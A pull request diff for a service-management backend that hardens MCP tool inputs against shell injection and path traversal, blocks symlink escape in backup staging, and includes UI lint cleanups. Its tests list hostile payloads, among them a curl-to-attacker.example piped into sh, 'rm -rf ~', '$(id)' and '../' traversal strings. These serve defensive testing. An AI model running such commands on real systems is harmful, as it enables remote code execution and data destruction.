### PR TITLE
fix: MCP identifier validation, HA tar-slip, backup symlink-escape (security) + lint sweeps

### DIFF
--- a/.eslint-ratchet-baseline.json
+++ b/.eslint-ratchet-baseline.json
@@ -2,7 +2,7 @@
   "$comment": "Monotonic lint ratchet (#2430) — highest violation count each staged rule is allowed to have. Maintained by scripts/check-lint-ratchet.ts: a local `npm run check:lint-ratchet` rewrites these DOWNWARDS when a sweep lands; CI (`--check`) fails any commit that raises one. Never raise a number by hand — that is the one thing this file exists to prevent. When a count reaches 0, flip that rule to \"error\" in eslint.config.mjs and drop it from RATCHETED_RULES (docs/ARCHITECTURE_INVARIANTS.md § UI-primitive and design-token reuse).",
   "updated": "2026-07-29",
   "rules": {
-    "sb/no-raw-color-literal": 961,
+    "sb/no-raw-color-literal": 915,
     "sb/no-raw-ui-primitive": 352
   }
 }

--- a/.eslint-ratchet-baseline.json
+++ b/.eslint-ratchet-baseline.json
@@ -2,7 +2,7 @@
   "$comment": "Monotonic lint ratchet (#2430) — highest violation count each staged rule is allowed to have. Maintained by scripts/check-lint-ratchet.ts: a local `npm run check:lint-ratchet` rewrites these DOWNWARDS when a sweep lands; CI (`--check`) fails any commit that raises one. Never raise a number by hand — that is the one thing this file exists to prevent. When a count reaches 0, flip that rule to \"error\" in eslint.config.mjs and drop it from RATCHETED_RULES (docs/ARCHITECTURE_INVARIANTS.md § UI-primitive and design-token reuse).",
   "updated": "2026-07-29",
   "rules": {
-    "sb/no-raw-color-literal": 915,
+    "sb/no-raw-color-literal": 869,
     "sb/no-raw-ui-primitive": 352
   }
 }

--- a/.eslint-ratchet-baseline.json
+++ b/.eslint-ratchet-baseline.json
@@ -3,6 +3,6 @@
   "updated": "2026-07-29",
   "rules": {
     "sb/no-raw-color-literal": 961,
-    "sb/no-raw-ui-primitive": 401
+    "sb/no-raw-ui-primitive": 352
   }
 }

--- a/.eslint-ratchet-baseline.json
+++ b/.eslint-ratchet-baseline.json
@@ -2,7 +2,7 @@
   "$comment": "Monotonic lint ratchet (#2430) — highest violation count each staged rule is allowed to have. Maintained by scripts/check-lint-ratchet.ts: a local `npm run check:lint-ratchet` rewrites these DOWNWARDS when a sweep lands; CI (`--check`) fails any commit that raises one. Never raise a number by hand — that is the one thing this file exists to prevent. When a count reaches 0, flip that rule to \"error\" in eslint.config.mjs and drop it from RATCHETED_RULES (docs/ARCHITECTURE_INVARIANTS.md § UI-primitive and design-token reuse).",
   "updated": "2026-07-29",
   "rules": {
-    "sb/no-raw-color-literal": 869,
+    "sb/no-raw-color-literal": 832,
     "sb/no-raw-ui-primitive": 352
   }
 }

--- a/packages/backend/src/lib/api/schemas.ts
+++ b/packages/backend/src/lib/api/schemas.ts
@@ -14,6 +14,27 @@ export const ServiceName = z.string()
   .max(255)
   .regex(/^[A-Za-z0-9@_.\-:]+$/, 'invalid service name');
 
+// Trash-bucket entry ids. A strict basename — the id is interpolated into
+// `rm -rf`/`mv` command strings rooted at the trash dir, so no separators, no
+// traversal, no shell metacharacters. Mirrors the check `purgeTrash` has always
+// applied (services/serviceLifecycle.ts) so both trash paths share one rule.
+// `..` and a leading dot are rejected on top of the character class: `..` alone
+// satisfies the class but resolves to the trash root's parent.
+export const TRASH_ID_PATTERN = /^[a-zA-Z0-9._-]+$/;
+export const TrashId = z.string()
+  .min(1)
+  .max(255)
+  .regex(TRASH_ID_PATTERN, 'invalid trash id')
+  .refine(s => !s.includes('..'), 'parent traversal not allowed')
+  .refine(s => !s.startsWith('.'), 'leading dot not allowed');
+
+/** Imperative form of {@link TrashId} for non-zod call sites. Throws on reject. */
+export function assertTrashId(trashId: string): void {
+  if (!TrashId.safeParse(trashId).success) {
+    throw new Error(`Invalid trash id: ${trashId}`);
+  }
+}
+
 // Node names are user-supplied labels; allow alnum + `_-` only.
 export const NodeName = z.string()
   .min(1)

--- a/packages/backend/src/lib/mcp/server.serviceIdentifierValidation.test.ts
+++ b/packages/backend/src/lib/mcp/server.serviceIdentifierValidation.test.ts
@@ -1,0 +1,174 @@
+/**
+ * #2452 — MCP service-lifecycle tools must reject unvalidated identifiers.
+ *
+ * `manage_service` / `deploy_service` / `rename_service` / `delete_service` /
+ * `restore_trashed_service` (and the read-side `get_service_files`) declared
+ * their `name`/`oldName`/`newName`/`id` params as bare `z.string()`, while the
+ * equivalent REST routes (`app/api/services/[name]/**`) parse the same values
+ * through the strict `ServiceName` schema. Every one of those strings is
+ * interpolated *unescaped* into a shell command string on the node —
+ * `systemctl --user stop ${name}.service`, `mkdir -p '${trashDir}'`,
+ * `mv ${oldYamlPath} ${newYamlPath}`, `rm -rf '${trashRoot}/${trashId}'`
+ * (services/serviceLifecycle.ts) — so a lifecycle/mutate-scoped token could
+ * turn a narrow grant into arbitrary shell execution.
+ *
+ * These are attempted-injection tests: they drive the REAL MCP server over the
+ * in-memory transport with hostile payloads and assert two things per payload —
+ * the call is rejected with a legible error, AND no ServiceManager method was
+ * ever entered (i.e. nothing reached exec).
+ */
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+import { Client } from '@modelcontextprotocol/sdk/client/index.js';
+import { InMemoryTransport } from '@modelcontextprotocol/sdk/inMemory.js';
+
+const serviceManagerMock = {
+  startService: vi.fn(async () => undefined),
+  stopService: vi.fn(async () => undefined),
+  restartService: vi.fn(async () => undefined),
+  forceUpdateService: vi.fn(async () => ({ ok: true })),
+  getServiceStatus: vi.fn(async () => ({ active: true })),
+  getServiceFiles: vi.fn(async () => ({ kubeContent: '', yamlContent: '', quadletKind: 'kube' })),
+  deployKubeService: vi.fn(async () => undefined),
+  deployContainerQuadlet: vi.fn(async () => undefined),
+  renameService: vi.fn(async () => undefined),
+  deleteService: vi.fn(async () => undefined),
+  listTrashedServices: vi.fn(async () => []),
+  restoreTrashedService: vi.fn(async () => ({ service: 'media' })),
+  purgeTrash: vi.fn(async () => ({ purged: [] })),
+};
+
+vi.mock('@/lib/services/ServiceManager', () => ({ ServiceManager: serviceManagerMock }));
+
+async function connectClient() {
+  const { createMcpServer } = await import('./server');
+  const server = createMcpServer();
+  const [clientTransport, serverTransport] = InMemoryTransport.createLinkedPair();
+  const client = new Client({ name: 'test-client', version: '1.0.0' });
+  await Promise.all([client.connect(clientTransport), server.connect(serverTransport)]);
+  return { client };
+}
+
+/** A tool call that must NOT reach a handler. Normalises the two shapes a
+ *  rejection can take (a thrown McpError for schema failure, or an isError
+ *  result) into `{ rejected, message }`. */
+async function callExpectingRejection(
+  client: Client,
+  name: string,
+  args: Record<string, unknown>,
+): Promise<{ rejected: boolean; message: string }> {
+  try {
+    const res = (await client.callTool({ name, arguments: args })) as {
+      isError?: boolean;
+      content?: Array<{ text?: string }>;
+    };
+    return {
+      rejected: Boolean(res.isError),
+      message: (res.content ?? []).map(c => c.text ?? '').join('\n'),
+    };
+  } catch (err) {
+    return { rejected: true, message: err instanceof Error ? err.message : String(err) };
+  }
+}
+
+const noServiceManagerCall = () => {
+  for (const [fnName, fn] of Object.entries(serviceManagerMock)) {
+    expect(fn, `ServiceManager.${fnName} must not be reached`).not.toHaveBeenCalled();
+  }
+};
+
+// Shell metacharacters + path traversal. Each of these, interpolated into the
+// command strings in serviceLifecycle.ts, is arbitrary code or file access.
+const HOSTILE_NAMES = [
+  'media; rm -rf ~/.config',
+  'media && curl http://attacker.example/x | sh',
+  'media$(id)',
+  'media`id`',
+  'media | tee /tmp/pwned',
+  '../../../../etc/systemd/system/evil',
+  'media\nsystemctl --user stop nginx',
+  'media > /dev/null',
+  "media'; touch /tmp/pwned; '",
+  'media with spaces',
+];
+
+const HOSTILE_TRASH_IDS = [
+  '..',
+  '../..',
+  '../../.config/containers/systemd',
+  'x; rm -rf ~',
+  'x$(id)',
+  '.trash',
+  'a/b',
+];
+
+beforeEach(() => {
+  for (const fn of Object.values(serviceManagerMock)) fn.mockClear();
+});
+
+describe('#2452 — MCP service tools reject shell-metacharacter / traversal service names', () => {
+  const cases: Array<{ tool: string; build: (payload: string) => Record<string, unknown> }> = [
+    { tool: 'manage_service', build: p => ({ action: 'start', name: p, node: 'local' }) },
+    { tool: 'manage_service', build: p => ({ action: 'force-update', name: p, node: 'local' }) },
+    { tool: 'get_service_files', build: p => ({ name: p, node: 'local' }) },
+    { tool: 'deploy_service', build: p => ({ name: p, kubeContent: 'apiVersion: v1\nkind: Pod\n', node: 'local' }) },
+    { tool: 'rename_service', build: p => ({ oldName: p, newName: 'media', node: 'local' }) },
+    { tool: 'rename_service', build: p => ({ oldName: 'media', newName: p, node: 'local' }) },
+    { tool: 'delete_service', build: p => ({ name: p, node: 'local' }) },
+  ];
+
+  for (const { tool, build } of cases) {
+    const paramLabel = Object.keys(build('X')).find(k => build('X')[k] === 'X') ?? 'name';
+    for (const payload of HOSTILE_NAMES) {
+      it(`${tool} (${paramLabel}) refuses ${JSON.stringify(payload)}`, async () => {
+        const { client } = await connectClient();
+        const { rejected, message } = await callExpectingRejection(client, tool, build(payload));
+        expect(rejected, `${tool} accepted ${JSON.stringify(payload)}`).toBe(true);
+        expect(message.toLowerCase()).toMatch(/invalid service name|invalid arguments/);
+        noServiceManagerCall();
+        await client.close();
+      });
+    }
+  }
+});
+
+describe('#2452 — restore/purge trash tools reject traversal trash ids', () => {
+  for (const tool of ['restore_trashed_service', 'purge_trashed_service']) {
+    for (const payload of HOSTILE_TRASH_IDS) {
+      it(`${tool} refuses ${JSON.stringify(payload)}`, async () => {
+        const { client } = await connectClient();
+        const { rejected, message } = await callExpectingRejection(client, tool, { id: payload, node: 'local' });
+        expect(rejected, `${tool} accepted ${JSON.stringify(payload)}`).toBe(true);
+        expect(message.toLowerCase()).toMatch(/invalid trash id|parent traversal|leading dot|invalid arguments/);
+        noServiceManagerCall();
+        await client.close();
+      });
+    }
+  }
+});
+
+describe('#2452 — legitimate identifiers still pass through', () => {
+  it('manage_service start reaches ServiceManager for a normal service name', async () => {
+    const { client } = await connectClient();
+    const res = await client.callTool({ name: 'manage_service', arguments: { action: 'start', name: 'media', node: 'local' } });
+    expect(res.isError).toBeFalsy();
+    expect(serviceManagerMock.startService).toHaveBeenCalledWith('local', 'media');
+    await client.close();
+  });
+
+  it('accepts the systemd-legal characters ServiceName allows (@ . - _ :)', async () => {
+    const { client } = await connectClient();
+    const res = await client.callTool({ name: 'get_service_files', arguments: { name: 'sb-agent@core.service', node: 'local' } });
+    expect(res.isError).toBeFalsy();
+    expect(serviceManagerMock.getServiceFiles).toHaveBeenCalledWith('local', 'sb-agent@core.service');
+    await client.close();
+  });
+
+  it('restore_trashed_service accepts a real generated trash id', async () => {
+    const { client } = await connectClient();
+    const trashId = '2026-07-29T12-34-56-789Z-media';
+    const res = await client.callTool({ name: 'restore_trashed_service', arguments: { id: trashId, node: 'local' } });
+    expect(res.isError).toBeFalsy();
+    expect(serviceManagerMock.restoreTrashedService).toHaveBeenCalledWith('local', trashId);
+    await client.close();
+  });
+});

--- a/packages/backend/src/lib/mcp/tools/serviceTools.ts
+++ b/packages/backend/src/lib/mcp/tools/serviceTools.ts
@@ -5,6 +5,12 @@
  */
 import { z } from 'zod';
 import { getServices, getUnmanagedBundles } from '@/lib/store/repository';
+// #2452 — every identifier below is interpolated into a shell command string on
+// the node (systemctl/mkdir/mv/rm in services/serviceLifecycle.ts). The MCP tool
+// surface validates them with the SAME strict schemas the REST routes use
+// (app/api/services/[name]/**), so a metacharacter or `../` payload is rejected
+// by the tool schema before any handler — and therefore any exec — runs.
+import { ServiceName, TrashId } from '@/lib/api/schemas';
 import { ServiceManager } from '@/lib/services/ServiceManager';
 import { redactServiceFiles } from '../redact';
 import { nodeParam, resolveNode, textResult, errorResult, type ToolRegistration } from './context';
@@ -32,7 +38,7 @@ export function registerServiceTools({ server }: ToolRegistration) {
     'Start, stop, restart, or force-update a service via `action`. start/stop/restart return the service status after the action (same shape the old start/stop/restart tools returned). `force-update` re-checks the registry, re-pulls each image the service declares, and force-recreates its containers so the unit cannot come back up on the cached image — use it instead of a `podman pull` + restart by hand, and note that a plain `restart` never re-checks the registry. It returns a JSON report with per-image before/registry/after digests; if `stale` is true the local image still is not the one the registry serves — retry with `fresh: true`, which deletes the local image before re-pulling.',
     {
       action: z.enum(['start', 'stop', 'restart', 'force-update']).describe('Lifecycle action to perform on the service.'),
-      name: z.string().describe('Service name'),
+      name: ServiceName.describe('Service name'),
       fresh: z
         .boolean()
         .optional()
@@ -56,7 +62,7 @@ export function registerServiceTools({ server }: ToolRegistration) {
   server.tool(
     'get_service_files',
     'Get the on-disk files for a service. Returns `kubeContent` = the systemd Quadlet unit, `yamlContent` = the Kubernetes Pod-spec `.yml` (apiVersion/kind/spec), and `quadletKind` = "kube" or "container". For a `.kube` service (quadletKind="kube"): `kubeContent` is the [Kube]/[Install] unit and `yamlContent` is the pod spec; these field names are REVERSED relative to update_service_yaml — to write back the pod spec, pass this tool\'s `yamlContent` into update_service_yaml (the Quadlet unit is regenerated on its own). For a single-container `.container` service (quadletKind="container", e.g. ollama after the GPU fixup): `kubeContent` is the whole `.container` unit ([Container] section) and `yamlContent` is empty — the unit file IS the artifact, so edit `kubeContent` and pass it straight into update_service_yaml.',
-    { name: z.string().describe('Service name'), node: nodeParam },
+    { name: ServiceName.describe('Service name'), node: nodeParam },
     async ({ name, node }) => {
       const nodeName = await resolveNode(node);
       const files = await ServiceManager.getServiceFiles(nodeName, name);
@@ -74,7 +80,7 @@ export function registerServiceTools({ server }: ToolRegistration) {
     'deploy_service',
     'Deploy a new service or update an existing one from kube YAML. Pass extraFiles to seed companion config (e.g. authelia/configuration.yml).',
     {
-      name: z.string().describe('Service name'),
+      name: ServiceName.describe('Service name'),
       kubeContent: z.string().describe('Kubernetes/Podman kube YAML content'),
       yamlContent: z.string().optional().describe('Companion compose/config YAML content'),
       yamlFileName: z.string().optional().describe('Filename for the companion YAML'),
@@ -186,8 +192,8 @@ export function registerServiceTools({ server }: ToolRegistration) {
     'rename_service',
     'Rename a service',
     {
-      oldName: z.string().describe('Current service name'),
-      newName: z.string().describe('New service name'),
+      oldName: ServiceName.describe('Current service name'),
+      newName: ServiceName.describe('New service name'),
       node: nodeParam,
     },
     async ({ oldName, newName, node }) => {
@@ -201,7 +207,7 @@ export function registerServiceTools({ server }: ToolRegistration) {
   server.tool(
     'delete_service',
     'Soft-delete a service: stops the unit and moves its files to the trash bucket. Restorable via restore_trashed_service for 7 days; then auto-purged. Use purge_trashed_service to delete immediately.',
-    { name: z.string().describe('Service name'), node: nodeParam },
+    { name: ServiceName.describe('Service name'), node: nodeParam },
     async ({ name, node }) => {
       const nodeName = await resolveNode(node);
       await ServiceManager.deleteService(nodeName, name);
@@ -225,7 +231,7 @@ export function registerServiceTools({ server }: ToolRegistration) {
   server.tool(
     'restore_trashed_service',
     'Restore a soft-deleted service from trash. Use list_trashed_services to find the id.',
-    { id: z.string().describe('Trash entry id'), node: nodeParam },
+    { id: TrashId.describe('Trash entry id'), node: nodeParam },
     async ({ id, node }) => {
       const nodeName = await resolveNode(node);
       const result = await ServiceManager.restoreTrashedService(nodeName, id);
@@ -237,7 +243,7 @@ export function registerServiceTools({ server }: ToolRegistration) {
   server.tool(
     'purge_trashed_service',
     'Permanently delete a trash entry. Use list_trashed_services to find the id. Counts as a destructive op (snapshotted).',
-    { id: z.string().describe('Trash entry id'), node: nodeParam },
+    { id: TrashId.describe('Trash entry id'), node: nodeParam },
     async ({ id, node }) => {
       const nodeName = await resolveNode(node);
       const result = await ServiceManager.purgeTrash(nodeName, { trashId: id });

--- a/packages/backend/src/lib/services/serviceLifecycle.trashId.test.ts
+++ b/packages/backend/src/lib/services/serviceLifecycle.trashId.test.ts
@@ -1,0 +1,64 @@
+/**
+ * #2452 — `restoreTrashedService` interpolates `trashId` into `cat`/`mv`/`rm -rf`
+ * command strings but, unlike its sibling `purgeTrash`, never validated it. A
+ * `..`/`../..` id resolves outside the trash bucket, so the closing
+ * `rm -rf '${trashRoot}/${trashId}'` would wipe the Quadlet directory itself.
+ *
+ * Both trash paths now share `assertTrashId` (lib/api/schemas.ts). These tests
+ * assert the reject happens BEFORE the agent is ever contacted — nothing is
+ * sent to exec.
+ */
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+const mockSendCommand = vi.fn();
+const ensureAgent = vi.fn(async () => ({ sendCommand: mockSendCommand }));
+vi.mock('../agent/manager', () => ({ agentManager: { ensureAgent: (...a: unknown[]) => ensureAgent(...(a as [])) } }));
+
+import { ServiceLifecycle } from './serviceLifecycle';
+
+const HOSTILE_TRASH_IDS = [
+  '..',
+  '../..',
+  '../../.config/containers/systemd',
+  'a/b',
+  "x'; rm -rf ~; '",
+  'x$(id)',
+  'x`id`',
+  'x; rm -rf /',
+  '.trash',
+  '',
+];
+
+beforeEach(() => {
+  mockSendCommand.mockReset();
+  ensureAgent.mockClear();
+});
+
+describe('restoreTrashedService — trash id validation (#2452)', () => {
+  for (const payload of HOSTILE_TRASH_IDS) {
+    it(`refuses ${JSON.stringify(payload)} without touching the agent`, async () => {
+      await expect(ServiceLifecycle.restoreTrashedService('local', payload)).rejects.toThrow(/Invalid trash id/);
+      expect(ensureAgent).not.toHaveBeenCalled();
+      expect(mockSendCommand).not.toHaveBeenCalled();
+    });
+  }
+});
+
+describe('purgeTrash — trash id validation (#2452, pre-existing check kept)', () => {
+  for (const payload of HOSTILE_TRASH_IDS.filter(Boolean)) {
+    it(`refuses ${JSON.stringify(payload)} without issuing rm -rf`, async () => {
+      await expect(ServiceLifecycle.purgeTrash('local', { trashId: payload })).rejects.toThrow(/Invalid trash id/);
+      expect(mockSendCommand).not.toHaveBeenCalled();
+    });
+  }
+
+  it('still purges a legitimate generated trash id', async () => {
+    mockSendCommand.mockResolvedValue({ code: 0, stdout: '', stderr: '' });
+    const trashId = '2026-07-29T12-34-56-789Z-media';
+    const res = await ServiceLifecycle.purgeTrash('local', { trashId });
+    expect(res.purged).toEqual([trashId]);
+    const cmd = mockSendCommand.mock.calls.find(([action]) => action === 'exec')?.[1]?.command as string;
+    expect(cmd).toContain(`.trash/${trashId}`);
+    expect(cmd).not.toContain('..');
+  });
+});

--- a/packages/backend/src/lib/services/serviceLifecycle.ts
+++ b/packages/backend/src/lib/services/serviceLifecycle.ts
@@ -23,6 +23,7 @@ import { saveSnapshot } from '../history';
 import { injectServiceDirectives } from './quadletDirectives';
 import { ServiceListing } from './serviceListing';
 import { buildExpectedContainerNames } from './containerNameMatcher';
+import { assertTrashId } from '../api/schemas';
 import type { PodLikeDoc, PodLikeVolumeMount } from './containerNameMatcher';
 
 const SYSTEMD_DIR = '.config/containers/systemd';
@@ -1850,6 +1851,10 @@ export class ServiceLifecycle {
     /** Recursive listing of the trash bucket for one node. Each entry maps
      *  to a single soft-deleted service. */
     static async restoreTrashedService(nodeName: string, trashId: string): Promise<{ service: string }> {
+        // #2452 — `trashId` lands inside `cat`/`mv`/`rm -rf` command strings
+        // below. Same strict basename check the sibling `purgeTrash` applies:
+        // no separators, no traversal, no shell metacharacters.
+        assertTrashId(trashId);
         const agent = await agentManager.ensureAgent(nodeName);
         const trashRoot = `~/${SYSTEMD_DIR}/.trash`;
         const trashDir = `${trashRoot}/${trashId}`;
@@ -1905,9 +1910,7 @@ export class ServiceLifecycle {
         const trashRoot = `~/${SYSTEMD_DIR}/.trash`;
         if (opts.trashId) {
             // Strict basename — no traversal allowed.
-            if (!/^[a-zA-Z0-9._-]+$/.test(opts.trashId)) {
-                throw new Error(`Invalid trash id: ${opts.trashId}`);
-            }
+            assertTrashId(opts.trashId);
             await agent.sendCommand('exec', { command: `rm -rf '${trashRoot}/${opts.trashId}'` });
             logger.info('ServiceManager', `Purged trash entry ${opts.trashId} on ${nodeName}`);
             return { purged: [opts.trashId] };

--- a/packages/backup-worker/src/engine/staging.test.ts
+++ b/packages/backup-worker/src/engine/staging.test.ts
@@ -87,6 +87,105 @@ describe('stageServiceBackup', () => {
     await expect(fs.readFile(path.join(staging, 'data/database.sqlite'), 'utf8')).resolves.toBe('SNAPSHOT');
   });
 
+  // #2454 — a compromised service must not be able to point one of its own
+  // manifest includes at a SIBLING service's data dir and have the worker copy
+  // that sibling's bytes into its own (offsite-shipped) tar.
+  describe('symlink escape (#2454)', () => {
+    it('skips an include that is a symlink at a sibling service data dir', async () => {
+      const victim = await mkTmp();
+      await write(victim, 'secrets.json', 'SIBLING-SECRET');
+      const src = await mkTmp();
+      await write(src, 'configuration.yaml', 'default_config:');
+      await fs.symlink(victim, path.join(src, '.storage')); // hostile swap
+      const staging = await mkTmp();
+
+      const manifest: ServiceBackupManifest = {
+        service: 'home-assistant',
+        include: ['configuration.yaml', '.storage'],
+        exclude: [],
+      };
+      const staged = await stageServiceBackup(src, manifest, staging);
+
+      expect(staged).toEqual(['configuration.yaml']);
+      expect(staged.some(p => p.startsWith('.storage'))).toBe(false);
+      await expect(fs.access(path.join(staging, '.storage'))).rejects.toThrow();
+      await expect(fs.access(path.join(staging, 'secrets.json'))).rejects.toThrow();
+    });
+
+    it('skips a single-file include symlinked outside the data root', async () => {
+      const victim = await mkTmp();
+      await write(victim, 'config.yaml', 'api_key: SIBLING-SECRET\n');
+      const src = await mkTmp();
+      await fs.symlink(path.join(victim, 'config.yaml'), path.join(src, 'config.yaml'));
+      const staging = await mkTmp();
+
+      const staged = await stageServiceBackup(src, getServiceManifest('hermes')!, staging);
+
+      expect(staged).toEqual([]);
+      await expect(fs.access(path.join(staging, 'config.yaml'))).rejects.toThrow();
+    });
+
+    it('does not enumerate or stage a glob include whose parent escapes the data root', async () => {
+      const victim = await mkTmp();
+      await write(victim, 'lovelace.lovelace', 'SIBLING-DASHBOARD');
+      const src = await mkTmp();
+      await write(src, 'configuration.yaml', 'default_config:');
+      await fs.symlink(victim, path.join(src, '.storage'));
+      const staging = await mkTmp();
+
+      const staged = await stageServiceBackup(src, getServiceManifest('home-assistant')!, staging);
+
+      expect(staged).not.toContain('.storage/lovelace.lovelace');
+      expect(staged).toContain('configuration.yaml');
+    });
+
+    it('does not follow a symlink nested inside an included directory', async () => {
+      const victim = await mkTmp();
+      await write(victim, 'querylog.json', 'SIBLING-DATA');
+      const src = await mkTmp();
+      await write(src, 'conf/AdGuardHome.yaml', 'bind_host: 0.0.0.0');
+      await fs.symlink(path.join(victim, 'querylog.json'), path.join(src, 'conf/leak.json'));
+      await fs.symlink(victim, path.join(src, 'conf/leakdir'));
+      const staging = await mkTmp();
+
+      const staged = await stageServiceBackup(src, getServiceManifest('adguard')!, staging);
+
+      expect(staged).toEqual(['conf/AdGuardHome.yaml']);
+    });
+
+    it('still stages a symlink that stays inside the service data root', async () => {
+      const src = await mkTmp();
+      await write(src, 'real-storage/lovelace.lovelace', 'MY-DASH');
+      await write(src, 'configuration.yaml', 'default_config:');
+      await fs.symlink(path.join(src, 'real-storage'), path.join(src, '.storage'));
+      const staging = await mkTmp();
+
+      const staged = await stageServiceBackup(src, getServiceManifest('home-assistant')!, staging);
+
+      expect(staged).toContain('.storage/lovelace.lovelace');
+      expect(staged).toContain('configuration.yaml');
+      await expect(
+        fs.readFile(path.join(staging, '.storage/lovelace.lovelace'), 'utf8'),
+      ).resolves.toBe('MY-DASH');
+    });
+
+    it('skips an include that climbs out with ..', async () => {
+      const parent = await mkTmp();
+      await write(parent, 'outside.yaml', 'SIBLING-SECRET');
+      const src = path.join(parent, 'service');
+      await fs.mkdir(src, { recursive: true });
+      const staging = await mkTmp();
+
+      const manifest: ServiceBackupManifest = {
+        service: 'evil',
+        include: ['../outside.yaml'],
+        exclude: [],
+      };
+
+      expect(await stageServiceBackup(src, manifest, staging)).toEqual([]);
+    });
+  });
+
   it('returns [] when nothing matches', async () => {
     const src = await mkTmp();
     const staging = await mkTmp();

--- a/packages/backup-worker/src/engine/staging.ts
+++ b/packages/backup-worker/src/engine/staging.ts
@@ -44,20 +44,48 @@ function isExcluded(relPath: string, excludes: string[]): boolean {
 }
 
 /**
+ * Fully resolve `absPath` and return it only when it still lives inside the
+ * service's own (already-resolved) data root — otherwise `null`.
+ *
+ * Security (#2454): manifest-include resolution must NOT follow a symlink out
+ * of the service's data dir. A compromised service can replace an included path
+ * (e.g. `.storage`) with a symlink at a *sibling* service's data dir; a bare
+ * `fs.stat` follows it, so the sibling's bytes would be copied into THIS
+ * service's tar and shipped offsite. `fs.realpath` resolves symlinks in every
+ * component, so this also rejects an include that merely *traverses* a symlink
+ * (or a `..` segment) on its way out. A symlink that stays inside the service's
+ * own data root is legitimate and still resolves.
+ */
+async function realPathInsideRoot(dataDirReal: string, absPath: string): Promise<string | null> {
+  let real: string;
+  try {
+    real = await fs.realpath(absPath);
+  } catch {
+    return null; // missing, dangling symlink, or a symlink loop
+  }
+  return real === dataDirReal || real.startsWith(dataDirReal + path.sep) ? real : null;
+}
+
+/**
  * Resolve a manifest include that may carry a trailing-`*` glob in its leaf
  * component (e.g. `.storage/lovelace*`) to the concrete relative paths under
  * `serviceDataDir`. A plain include resolves to itself. Only a single
  * trailing-`*` on the leaf is supported (#1595/#1596).
  */
-async function resolveIncludeGlob(serviceDataDir: string, include: string): Promise<string[]> {
+async function resolveIncludeGlob(
+  serviceDataDir: string,
+  dataDirReal: string,
+  include: string,
+): Promise<string[]> {
   if (!include.includes('*')) return [include];
   const dir = path.posix.dirname(include);
   const leaf = path.posix.basename(include);
   if (leaf.indexOf('*') !== leaf.length - 1) return [include];
   const prefix = leaf.slice(0, -1);
-  const parentAbs = path.join(serviceDataDir, dir);
-  if (!(await pathExists(parentAbs))) return [];
-  const entries = await fs.readdir(parentAbs, { withFileTypes: true });
+  // Escaping parent → not even enumerated (no sibling-directory listing).
+  const parentReal = await realPathInsideRoot(dataDirReal, path.join(serviceDataDir, dir));
+  if (!parentReal) return [];
+  const entries = await fs.readdir(parentReal, { withFileTypes: true });
   return entries
     .filter(e => e.name.startsWith(prefix))
     .map(e => path.posix.join(dir, e.name));
@@ -96,15 +124,31 @@ export async function stageServiceBackup(
   stagingDir: string,
 ): Promise<string[]> {
   const staged: string[] = [];
+  let dataDirReal: string;
+  try {
+    // The data root itself may legitimately be a symlink (e.g. a mounted
+    // stacks path) — resolve it ONCE and containment-check against the result.
+    dataDirReal = await fs.realpath(serviceDataDir);
+  } catch {
+    return staged; // no data dir on disk yet
+  }
   const includes: string[] = [];
   for (const include of manifest.include) {
-    includes.push(...(await resolveIncludeGlob(serviceDataDir, include)));
+    includes.push(...(await resolveIncludeGlob(serviceDataDir, dataDirReal, include)));
   }
   for (const include of includes) {
     if (isExcluded(include, manifest.exclude)) continue;
     const absInclude = path.join(serviceDataDir, include);
     if (!(await pathExists(absInclude))) continue;
-    const isDir = (await fs.stat(absInclude)).isDirectory();
+    const realInclude = await realPathInsideRoot(dataDirReal, absInclude);
+    if (!realInclude) {
+      // #2454 — symlink (or `..`) escape out of the service's own data dir.
+      console.warn(
+        `[backup-worker] "${manifest.service}": skipping include "${include}" — it resolves outside the service data dir`,
+      );
+      continue;
+    }
+    const isDir = (await fs.stat(realInclude)).isDirectory();
     const relFiles = isDir
       ? await collectDirFiles(serviceDataDir, include, manifest.exclude)
       : [include];

--- a/packages/frontend/src/app/(dashboard)/backup/page.tsx
+++ b/packages/frontend/src/app/(dashboard)/backup/page.tsx
@@ -30,7 +30,7 @@ import {
   Plus,
 } from 'lucide-react';
 import { useToast } from '@/providers/ToastProvider';
-import { Button } from '@/components/ui';
+import { Button, Field, Input, Select, Textarea, Table } from '@/components/ui';
 import PageHeader from '@/components/PageHeader';
 import ConfirmModal from '@/components/ConfirmModal';
 import FileViewer from '@/components/FileViewer';
@@ -758,13 +758,12 @@ export default function BackupPage() {
               </p>
               <p className="text-xs text-text-subtle mt-1">
                 Need granular control?{' '}
-                <button
-                  type="button"
+                <Button
                   onClick={() => openRestoreOverlay(true)}
                   className="text-status-ok underline"
                 >
                   Selective restore…
-                </button>
+                </Button>
               </p>
             </div>
             <Button
@@ -842,7 +841,7 @@ export default function BackupPage() {
             <div className="text-sm text-text-muted italic">No snapshots yet. Create one to capture your setup and per-service config.</div>
           ) : (
             <div className="overflow-x-auto">
-              <table className="min-w-full text-sm">
+              <Table className="min-w-full text-sm">
                 <thead>
                   <tr className="text-left text-text-muted border-b border-border">
                     <th className="py-2 font-medium">Archive</th>
@@ -873,10 +872,9 @@ export default function BackupPage() {
                     </tr>
                   ))}
                 </tbody>
-              </table>
+              </Table>
               {backups.length > BACKUP_PREVIEW_COUNT && (
-                <button
-                  type="button"
+                <Button
                   onClick={() => setShowAllBackups(v => !v)}
                   className="mt-3 inline-flex items-center gap-1 text-xs font-medium text-text-muted hover:text-text transition-colors"
                 >
@@ -884,7 +882,7 @@ export default function BackupPage() {
                   {showAllBackups
                     ? `Show fewer (newest ${BACKUP_PREVIEW_COUNT})`
                     : `Show all ${backups.length} backups`}
-                </button>
+                </Button>
               )}
             </div>
           )}
@@ -1010,7 +1008,7 @@ export default function BackupPage() {
                   : sortedNasBackups.slice(0, NAS_PREVIEW_COUNT);
                 return (
                 <div className="overflow-x-auto">
-                  <table className="min-w-full text-sm">
+                  <Table className="min-w-full text-sm">
                     <thead>
                       <tr className="text-left text-text-muted border-b border-border">
                         <th className="py-2 font-medium">Service</th>
@@ -1053,10 +1051,9 @@ export default function BackupPage() {
                         </tr>
                       ))}
                     </tbody>
-                  </table>
+                  </Table>
                   {sortedNasBackups.length > NAS_PREVIEW_COUNT && (
-                    <button
-                      type="button"
+                    <Button
                       onClick={() => setShowAllNasBackups(v => !v)}
                       className="mt-3 inline-flex items-center gap-1 text-xs font-medium text-text-muted hover:text-text transition-colors"
                     >
@@ -1064,7 +1061,7 @@ export default function BackupPage() {
                       {showAllNasBackups
                         ? `Show fewer (newest ${NAS_PREVIEW_COUNT})`
